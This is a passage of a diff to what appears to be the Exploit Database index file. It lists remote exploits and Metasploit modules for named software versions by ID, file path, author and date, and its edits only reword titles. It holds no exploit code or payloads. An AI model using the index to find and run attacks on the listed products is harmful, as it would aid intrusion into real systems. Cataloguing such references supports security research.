'/file/show.cgi' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000 @@ -12901,7 +12903,7 @@ id,file,description,date,author,platform,type,port 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0 21934,platforms/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",linux,remote,0 21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,linux,remote,0 -21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Function Buffer Overflow",2002-10-07,flea,linux,remote,0 +21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Buffer Overflow",2002-10-07,flea,linux,remote,0 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 @@ -13110,8 +13112,8 @@ id,file,description,date,author,platform,type,port 22664,platforms/windows/remote/22664.txt,"Sun ONE Application Server 7.0 - Source Disclosure",2003-05-27,"SPI Labs",windows,remote,0 22665,platforms/windows/remote/22665.txt,"Sun ONE Application Server 7.0 - Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",windows,remote,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0 -22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 -22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 +22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 +22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22686,platforms/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0 22691,platforms/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,windows,remote,0 @@ -13138,7 +13140,7 @@ id,file,description,date,author,platform,type,port 22783,platforms/windows/remote/22783.txt,"Microsoft Internet Explorer 5/6 - MSXML XML File Parsing Cross-Site Scripting",2003-06-17,"GreyMagic Software",windows,remote,0 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 -22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 +22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - GET Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 22787,platforms/windows/remote/22787.rb,"Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,windows,remote,0 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer Web Forums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote,0 22807,platforms/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",windows,remote,0 @@ -13337,7 +13339,7 @@ id,file,description,date,author,platform,type,port 23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,windows,remote,0 -23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - 'ISSymbol.ocx' 'InternationalSeparator()' Heap Overflow (Metasploit)",2012-12-20,Metasploit,windows,remote,0 +23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit)",2012-12-20,Metasploit,windows,remote,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0 23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 - 'swnet.dll' Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 @@ -13420,7 +13422,7 @@ id,file,description,date,author,platform,type,port 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 -23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c' 'auth_ident()' Function Overflow",2004-03-01,CMN,linux,remote,0 +23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow",2004-03-01,CMN,linux,remote,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free (Metasploit)",2013-01-02,Metasploit,windows,remote,0 @@ -13522,7 +13524,7 @@ id,file,description,date,author,platform,type,port 24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method",2004-06-16,"eEye Digital Security Team",windows,remote,0 24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method",2004-06-01,"eEye Digital Security Team",windows,remote,0 24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 -24223,platforms/linux/remote/24223.py,"Rlpr 2.0 - 'msg()' Function Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 +24223,platforms/linux/remote/24223.py,"Rlpr 2.0 - 'msg()' Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",multiple,remote,0 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,hardware,remote,0 24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",multiple,remote,0 @@ -13895,7 +13897,7 @@ id,file,description,date,author,platform,type,port 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26230,platforms/windows/remote/26230.txt,"Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure",2005-09-04,"Inge Henriksen",windows,remote,0 26306,platforms/windows/remote/26306.txt,"NateOn Messenger 3.0 - Arbitrary File Download / Buffer Overflow",2005-09-29,saintlinu,windows,remote,0 -26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept' 'p_t02' Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 +26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept p_t02' Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26318,platforms/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - 'f?p=' Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 @@ -13950,9 +13952,9 @@ id,file,description,date,author,platform,type,port 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",multiple,remote,0 27203,platforms/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 -27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 -27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 -27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 +27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp fullName' Parameter Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 +27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle fullName' Parameter Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 +27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp url' Parameter Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 @@ -13984,8 +13986,8 @@ id,file,description,date,author,platform,type,port 27568,platforms/windows/remote/27568.py,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1)",2006-04-04,"Luigi Auriemma",windows,remote,0 27569,platforms/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",windows,remote,0 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 -27595,platforms/php/remote/27595.txt,"PHP 4.x - 'tempnam()' Function open_basedir Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 -27596,platforms/php/remote/27596.txt,"PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 +27595,platforms/php/remote/27595.txt,"PHP 4.x - 'tempnam() open_basedir' Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 +27596,platforms/php/remote/27596.txt,"PHP 4.x - 'copy() Safe_Mode' Bypass Exploit",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000 @@ -14181,7 +14183,7 @@ id,file,description,date,author,platform,type,port 30049,platforms/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 -30018,platforms/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 +30018,platforms/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and 'InoCore.dll' - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 @@ -14219,9 +14221,9 @@ id,file,description,date,author,platform,type,port 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29771,platforms/windows/remote/29771.txt,"Microsoft Windows Vista - Windows Mail Local File Execution",2007-03-23,kingcope,windows,remote,0 29784,platforms/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 -29785,platforms/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php' 'd' ParameterTraversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 +29785,platforms/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php d' ParameterTraversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 -30117,platforms/php/remote/30117.php,"PHP 5.1.6 - 'Chunk_Split()' Function Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 +30117,platforms/php/remote/30117.php,"PHP 5.1.6 - 'Chunk_Split()' Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 30130,platforms/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote,0 30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 @@ -14229,7 +14231,7 @@ id,file,description,date,author,platform,type,port 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0 30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free (Metasploit)",2013-12-17,Metasploit,windows,remote,0 -29807,platforms/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 +29807,platforms/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29808,platforms/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 @@ -14349,7 +14351,7 @@ id,file,description,date,author,platform,type,port 30643,platforms/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,remote,0 30645,platforms/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 -30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 +30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0 30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0 @@ -14433,7 +14435,7 @@ id,file,description,date,author,platform,type,port 31264,platforms/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,php,remote,80 31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Parameter Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0 31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0 -31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - 'zseticcspace()' Function Buffer Overflow",2008-02-27,"Will Drewry",linux,remote,0 +31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - 'zseticcspace()' Buffer Overflow",2008-02-27,"Will Drewry",linux,remote,0 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting",2008-02-28,"Richard Brain",hardware,remote,0 31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting",2008-03-06,"Henri Lindberg",hardware,remote,0 31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device - Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0 @@ -14499,10 +14501,10 @@ id,file,description,date,author,platform,type,port 31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 - dsdn/dsweb/SearchResults URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote,0 31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 - dsdn/dsweb/Services/User URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote,0 31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 - docushare/dsweb/ServicesLib/Group URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote,0 -31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",windows,remote,0 +31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",windows,remote,0 31875,platforms/linux/remote/31875.py,"Python - 'socket.recvfrom_into()' Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0 -31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 -31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 +31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php css_exceptions' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 +31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php sql_matchscope' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote,0 31901,platforms/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Parameter Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 @@ -14610,7 +14612,7 @@ id,file,description,date,author,platform,type,port 32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,windows,remote,0 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,multiple,remote,0 32690,platforms/linux/remote/32690.txt,"xterm - DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 -32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - libaudiofile 'msadpcm.c' '.WAV' File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 +32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - libaudiofile 'msadpcm.c .WAV' File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products - Unspecified Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 @@ -14629,7 +14631,7 @@ id,file,description,date,author,platform,type,port 32794,platforms/php/remote/32794.rb,"Vtiger - Install Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,php,remote,80 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 -32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 +32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 @@ -14994,7 +14996,7 @@ id,file,description,date,author,platform,type,port 34925,platforms/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443 -34931,platforms/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 +34931,platforms/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM - 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote,0 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 @@ -15002,7 +15004,7 @@ id,file,description,date,author,platform,type,port 34950,platforms/php/remote/34950.php,"PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,php,remote,0 34952,platforms/multiple/remote/34952.txt,"Apache Shiro - Directory Traversal",2010-11-02,"Luke Taylor",multiple,remote,0 34978,platforms/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution",2010-11-08,"Gjoko Krstic",windows,remote,0 -34979,platforms/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Function Information Disclosure",2010-11-07,"Mateusz Kocielski",php,remote,0 +34979,platforms/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Information Disclosure",2010-11-07,"Mateusz Kocielski",php,remote,0 34985,platforms/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote,0 34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0 34997,platforms/windows/remote/34997.txt,"DServe - Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0 @@ -15095,7 +15097,7 @@ id,file,description,date,author,platform,type,port 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download",2011-04-03,KedAns-Dz,windows,remote,0 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution (Metasploit)",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution (Metasploit)",2014-12-15,Metasploit,php,remote,80 -35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' functions TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,linux,remote,0 +35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' / 'uc()' TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,linux,remote,0 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0 35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082 @@ -15105,11 +15107,11 @@ id,file,description,date,author,platform,type,port 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 